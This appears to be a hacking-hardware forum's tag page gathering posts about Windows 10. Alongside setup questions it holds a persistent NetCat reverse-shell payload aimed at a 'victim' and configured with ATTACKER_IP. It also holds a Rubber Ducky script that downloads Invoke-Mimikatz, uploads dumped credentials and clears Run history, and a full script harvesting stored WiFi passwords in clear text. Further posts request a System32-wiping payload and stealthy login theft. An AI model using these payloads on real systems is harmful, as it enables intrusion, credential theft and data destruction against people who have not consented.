
Showing results for tags 'windows 10'.

  1. I'm trying to use the wp6 script to get internet but it's not working. I'm properly connected to my home Wi-Fi on my computer. Here is a picture http://pasteboard.co/WGcRSnX.png Any help is appreciated
  2. Windows Persistent Reverse Shell for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker. Targets Windows 10 (working on support for older versions) Connection can be closed and reconnected at any time Deploys in roughly 15-20 sec Works with NetCat Requirements Have a working Bash Bunny :) STATUS LED STATUS Purple Setup Amber (Single Blink) Installing and running scripts Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from WindowsPersistentReverseShell to either switch folder Edit the persistence.vbs file and replace ATTACKER_IP with attacker's IP and PORT with whichever port you like to use (I use 1337 ?) Save the persistence.vbs file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the persistence.vbs file on NetCat Run the command nc -nlvp 1337 (replace the port with the port in persistence.vbs) If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command ncat instead of nc from the directory that you installed ncat.exe. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute) Once a Windows cmd prompt appears...YOU'RE DONE!! ? and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download
  3. Hi, I have been working in a computer store for a while and we get computers in with passwords that the user can't remember or they want us to remove the password. I just help out with the store and try my best to learn what I can but my knowledge is limited. We mainly use password cracking methods such as booting off a CD or USB with a cracking program such as offline PW, these work well but we haven't been able to find any that are able to crack Windows 10. If there is one out there that has been tested and does in fact work that would be awesome news :D But I would also like to learn how to crack these passwords myself, without using a program to do it for me, even just using a different shell such as Kali and use the terminal in there or just the cmd on Windows. All help is greatly appreciated, thank you.
  4. Greetings, I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet. I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address): DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit ENTER I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receives the data?? With: 'nc -l -p 80'. What am I doing wrong here?
  5. Hello, tried to set up the Nano in Windows 10 and Chrome. Followed the steps from the video. https://www.wifipineapple.com/pages/faq#collapse-Four But I get no connection from the Nano to the internet. On the wifi, I go on properties, and choose the Pineapple to share connection. Then I go on the Pineapple, to ip4 and change the ip to: and subnetmask to: correct? But it still says "not identified network" and on the Pineapple I get message "Error connection to the WIFIPineapple.com. Please check your connection" Tried the network autofix in Windows, but it found nothing. What can I do? :-/
  6. As the title says, I would like to learn to change/spoof my MAC address. I changed my network card's Locally Administered MAC Address but this did not work, as after a restart to make the changes set in I checked my modem-router and it showed that my MAC address was still the hardware's value rather than the new one I set. If I did something wrong please let me know, if there is something else I can try I'm all ears. All help is greatly appreciated.
  7. My first script using the Ducky... Beg stole and borrowed from other peoples code and amended to get to what I wanted, most of the code is form Darren Kitchen's 15 second password hack for bits around how to use Twin Ducky and how to keep use and save files whilst mounting the Ducky as a USB storage device... It's not perfect but hits the mark for what I currently need. To summarise: * It creates a .BAT file in %TEMP% which finds the assigned drive of the DUCKY * It then uses Select-String cmdlet to get the password for the wireless networks on the target machine * Saves this (albeit slightly messily) to Output.txt on the Ducky * Finally gets rid of the TEMP file and history in the run command window Look forward to comments and anything anyone can suggest to speed this up and make it better. Cheers Audie Ducky Script REM Author: Audie2180 REM Ducky WIFI credential plain text password report: 1.0 REM Target: Windows 10 REM Firmware: Twin Duck 2.1 REM Description: Runs Powershell to get wifi password using ConvertFrom-String, saves to notepad, saves to Ducky, Clears up tracks DELAY 1000 REM ----Open cmd as administrator GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM ----Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM ----Make batch file that waits for SD card to mount. 
REM ----Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( ENTER STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do ( ENTER STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" ) ENTER STRING ) ENTER STRING ) ENTER STRING if Exist %DuckyDrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM ----Continue script STRING Powershell %DuckyDrive%\a.ps1 > %DuckyDrive%\Output.txt ENTER CONTROL z ENTER REM --- Close CMD DELAY 500 ALT F4 DELAY 500 REM ---- Run BAT file DELAY 1000 GUI r DELAY 500 STRING %TEMP%/DuckyWait.bat DELAY 500 ENTER DELAY 800 REM ----Open cmd as administrator GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM --- Clean up, close CMD, delete tmp files, remove command prompt hist REM --- Cleanup file created DELAY 500 STRING del /f %TEMP%\DuckyWait.bat ENTER REM ----Clear the Run history and exit DELAY 500 STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit REM --- Close CMD DELAY 500 ALT F4 DELAY 500 REM ---- Flash CAPSLOCK CAPSLOCK DELAY 500 CAPSLOCK DELAY 500 CAPSLOCK DELAY 500 CAPSLOCK ... which obviously needs to be compiled as an inject.bin, but also needs the following Powershell file... a.ps1 #Make a list with all WiFi SSID's and passwords stored locally on Windows OS. 
$output = netsh.exe wlan show profiles $profileRows = $output | Select-String -Pattern 'All User Profile' $profileNames = New-Object System.Collections.ArrayList #for each profile name get the SSID and password for($i = 0; $i -lt $profileRows.Count; $i++){ $profileName = ($profileRows[$i] -split ":")[-1].Trim() $profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear $SSIDSearchResult = $profileOutput| Select-String -Pattern 'SSID Name' $profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"' $passwordSearchResult = $profileOutput| Select-String -Pattern 'Key Content' if($passwordSearchResult){ $profilePw = ($passwordSearchResult -split ":")[-1].Trim() } else { $profilePw = '' } $networkObject = New-Object -TypeName psobject -Property @{ ProfileName = $profileName SSID = $profileSSID Password = $profilePw } $profileNames.Add($networkObject) } $profileNames | Sort-Object ProfileName | Select-Object ProfileName, SSID, Password
  8. So here's what's going on: I made a shell, using reverse_tcp. And I put it on victim's computer and opened it, everything went smoothly in the process of opening the exe, anyway after I opened it, the shell didn't send a TCP connection back to me. I'm doing this on a LAN network, both computers are right beside each other connected to ethernet. I made the exploit in a VM then uploaded it to MediaFire and downloaded on other PC. But when I ran it, I didn't get a connection back, it was like it was never run. Here's all my console output currently, even after opening I didn't take a screenshot but I did copy and paste. And put it on pastebin, so here's the link, hopefully one of you can help me. I would also like to say that the target PC had antivirus disabled. LINK: https://pastebin.com/R9G5nQGB I used port 4444 and my local IP. That link shows the whole process of setting up the payload and handler, that's all I did. Thanks to everyone who takes the time to read this, I really need help.
  9. I walked through the Windows 10 setup on my PC. Is it possible to do the Android setup on the same device OR would I need a 2nd Nano? Can I switch between my laptop and an Android phone for mobile scanning? The Windows 10 setup works fine. Don't want to damage it. Thanks for your help.
  10. Followed every step from the video https://www.wifipineapple.com/pages/faq#collapse-Four, but had no success in sharing internet connection with clients connected to NANO. Any clues?
  11. So I am picking up this bad boy today http://www.microcenter.com/product/474706/XPS_15_156_Gaming_Laptop_Computer_-_Silver and I am going to throw Ubuntu 16.04 on it. I am not interested in dual booting as I have been using Linux for years. However, now that Windows 10 doesn't come with physical CD keys anymore, does anyone know a way to get the Windows 10 licence key extracted in case I want to throw Windows back on it?
  12. As of 10/30/17 Kali Linux downloads will not work, through both the HTTP download and the torrent link, both debian.exe installer packages cannot locate win32-loader.ini on my Windows 10 laptop. If anybody has a torrent for the old ISO file it would be much appreciated, I've been at this for about 3 hours now and can't find an ISO image to flash onto the USB stick on kali.org and the virtual images are not working for me either.
  13. Hi Guys, My friend has lent me his harddrive with some music production files (.wav and .mp3 files) on it but he has somehow encrypted the files and has asked me to remove the encryption from it. He says he used Windows 10 and after some digging around found Microsoft uses EFS Encryption. I tried his laptop to remove the encryption as it would have had the key to it and after an hour of playing around he tells me that he re-installed the OS so the key would have been lost. I have searched online for a few answers and found a couple which haven't convinced me. I found this site https://www.elcomsoft.co.uk/aefsdr.html that says it can remove EFS on NTFS but I am not willing to pay the price tag unless I have proof of success If anyone can verify for me that they have a good success rate that would be awesome Or does anyone know if GitHub has any programs that can be run in a Linux OS like Kali or Parrot that I can use to break the encryption?
  14. Hello! I recently ordered a USB Rubber Ducky, and still a noob at it. I was wondering if one of you guys would be kind enough to make it do something, if it's possible. I want it, after it's plugged, to immediately start backing up the windows 10 and then after that it sends saves it online, or I heard about "TwinDuck" which can make it save it on there, which is better... So after it saves a backup on the Ducky, I want it to completely destroy the PC, maybe by erasing "System32" I am not sure I just want it to mess it up and delete everything. All while the backup is still on the rubber ducky. I would really appreciate if one could help me with such a mission, thanks! PS: If it could be compatible with all windows versions, it would be better.
  15. I am trying to setup wifi pineapple nano but when I get to the part with load bulletin it crashes my PC and gives me the error in this picture. Also when I try to do "firmware upgrade" to also check if it's working I get this error: "Error connecting to WiFiPineapple.com. Please check your connection." Any Help?
  16. I am trying to setup wifi pineapple nano but when I get to the part with load bulletin it crashes my PC and gives me the error in this picture. Also when I try to do "firmware upgrade" to also check if it's working I get this error: "Error connecting to WiFiPineapple.com. Please check your connection." Any Help?
  17. I'm trying to upgrade my firmware of this yard stick one. But I keep getting different errors. Now I have the bad address one. root@raspberrypi3:/home/pi/rfcat_170508# rfcat_bootloader /dev/RFCAT_BL_YS1 erase_all RC = 0 (OK) root@raspberrypi3:/home/pi/rfcat_170508# rfcat_bootloader /dev/RFCAT_BL_YS1 download firmware/CCBootloader/CCBootloader-rfcat-ys1.hex Writing :0600000002017B02140363 RC = 3 (Bad Address) Error downloading code!
  18. I am finding that I am having an error with some PowerShell code that I am working on. What I want to be able to do is to have a variable, say $uk, where the drive label name is 'backup' and then force the creation of folders using the declared variable as the drive letter eg $uk\$env:computername\$env:username . The code is pasted below: #Asssigns $uk Variable to current drive letter for the mounted volume where the label name = backup $uk = Get-WmiObject Win32_Volume | ? {$_.label -eq 'backup'} #Creates a directory on the C:\ Drive naming the folders [The Computer Name] and [User] and ignores if already exists. md $uk\$env:computername\$env:username -force | Out-Null #It then uses Get-WmiObject to get the OS information and exports this info to the created directory calling the file export.csv. Get-WmiObject -class win32_operatingsystem | Export-Csv $uk\$env:computername\$env:username\export.csv #Then echos Export Complete into console. echo "Export Complete" #Sleep for two seconds. Start-Sleep -s 2 #Kill Powershell process. #stop-process -Id $Pid However, when this runs I get this error: md : Illegal characters in path. At C:\Users\Matt\OneDrive\Documents\Matt's Documents\ExportOSInfo.ps1:8 char:1 + md $uk\$env:computername\$env:username -force | Out-Null + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidArgument: (\\MATT-PC\root\...6ed}\\"\MATT-PC:String) [New-Item], Argu mentException + FullyQualifiedErrorId : ItemExistsArgumentError,Microsoft.PowerShell.Commands.NewItemCommand md : Illegal characters in path. 
At C:\Users\Matt\OneDrive\Documents\Matt's Documents\ExportOSInfo.ps1:8 char:1 + md $uk\$env:computername\$env:username -force | Out-Null + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidArgument: (\\MATT-PC\root\...6ed}\\"\MATT-PC:String) [New-Item], Argu mentException + FullyQualifiedErrorId : CreateDirectoryArgumentError,Microsoft.PowerShell.Commands.NewItemCommand md : Illegal characters in path. At C:\Users\Matt\OneDrive\Documents\Matt's Documents\ExportOSInfo.ps1:8 char:1 + md $uk\$env:computername\$env:username -force | Out-Null + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidArgument: (\\MATT-PC\root\...\"\MATT-PC\Matt:String) [New-Item], Argu mentException + FullyQualifiedErrorId : CreateDirectoryArgumentError,Microsoft.PowerShell.Commands.NewItemCommand Export-Csv : Cannot perform operation because the wildcard path \\MATT-PC\root\cimv2:Win32_Volume.DeviceID= "\\\\?\\Volume{2277fba4-e118-11e3-8533-94de807ff6ed}\\"\MATT-PC\Matt\export.csv did not resolve to a file. At C:\Users\Matt\OneDrive\Documents\Matt's Documents\ExportOSInfo.ps1:10 char:46 + ... ingsystem | Export-Csv $uk\$env:computername\$env:username\export.csv ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : OpenError: (\\MATT-PC\root\...Matt\export.csv:String) [Export-Csv], FileNotF oundException + FullyQualifiedErrorId : FileOpenFailure,Microsoft.PowerShell.Commands.ExportCsvCommand Obviously there is an error in the file path where it is trying to get the volume. I am not too sure how i would fix this tried wrapping the variable name in ${} and with a :\ after the variable eg $uk:\, neither of these produce the desired result. Can anyone help? Matt
  19. Can somebody of the staff answer this question please? How can I get RNDIS_ethernet to work on Windows 10?
  20. Has anyone encountered issues when plugging the Bash Bunny into a Windows 10 machine? RNDIS_ETHERNET on Windows 10 brings up a Device Driver Install window which stays on the screen for some time. This can be minimized via the bunny script; however I wasn't sure if this was an expected behavior.
  21. Has anyone else come across any driver issues with the RNDIS or WPD drivers for BashBunny on Windows 10 x64 Build 14393? Flash drive loads, payload is set for ATTACKMODE RNDIS_ETHERNET STORAGE and the device shows in device manager but without drivers.
  22. Greetings, I just received the BashBunny in the mail, so please bear with me. I was just trying to get started, when I ran into problems trying to share an internet connection w/ Windows 10. If I use the default payload on switch 2, ATTACKMODE RNDIS_ETHERNET STORAGE, or vice versa, it refuses to pop up as an Ethernet device in Windows. Just RNDIS_ETHERNET works, but isn't that kind of a problem when it comes to saving loot? On a side note: "Many combinations of attack modes are possible, however some are not. For example, ATTACKMODE HID STORAGE ECM_ETHERNET is valid while ATTACKMODE RNDIS_ETHERNET ECM_ETHERNET STORAGE SERIAL is not." - http://wiki.bashbunny.com/#!index.md How do I know what is a proper attackmode combination?
  23. Hi, I have my Nano setup properly on 2 laptops. However when I try to use my desktop at home there is no dropdown box to select the pineapple for internet sharing in the configure adapters menu for Win 10? I have tried disabling Defender which was suggested on another site, did not fix it. :( Any help would be greatly appreciated Here is a screenshot there should be a dropdown menu under Allow other network users to connect
  24. Hello, first time posting, so please feel free to correct me if I am posting in the wrong place. I am finally upgrading my old rig to 64bit and reformatting so as to have a clean install with multiple partitions, so I can easily reformat in the future. What I was trying to find and could not locate was the episode in the pre-revision3 days where Darren had made a boot disk with all of the software he wanted already pre-installed on the OS. I would like to do the same but in a reformat drive. Where I would boot my PC into and do a clean install with all my software already there, just need to load keys or update them. At one point I thought I would make my setup and then make a ghost image of it on a drive. So I would just copy the image back over the drive with my OS on it. Can this be done on Windows 10 and how should I go about it?
  25. I purchased the Rubber Ducky recently to grab Windows login creds from Windows 10. I was unaware at the time that it wouldn't quite work as solid on 10 as it does with older versions of Windows. After testing on various other versions and having it upload the .creds to my server, nothing happened when I attempted it on my target machine (Windows 10). I played around with it quite a bit and finally got the .creds uploading but with 0 data. Doing some research I came across this page explaining using PowerMemory to edit the registry for storing plaintext credentials. I did this the manual way, rebooted, and voilà I have my .creds file on the server with the credentials. However this was done on a test machine and not my target machine. HERE IS MY REQUEST: Does anyone have or can write a payload to automate this process in a stealth manner much like the Mr Robot payload? Maybe I am overlooking something as I am so new to this. Also it could be possible that it would have worked without PowerMemory editing the registry as I disabled Windows Defender before trying PM as I saw it has blocked some MK features during my previous attempts. Any feedback would be greatly appreciated!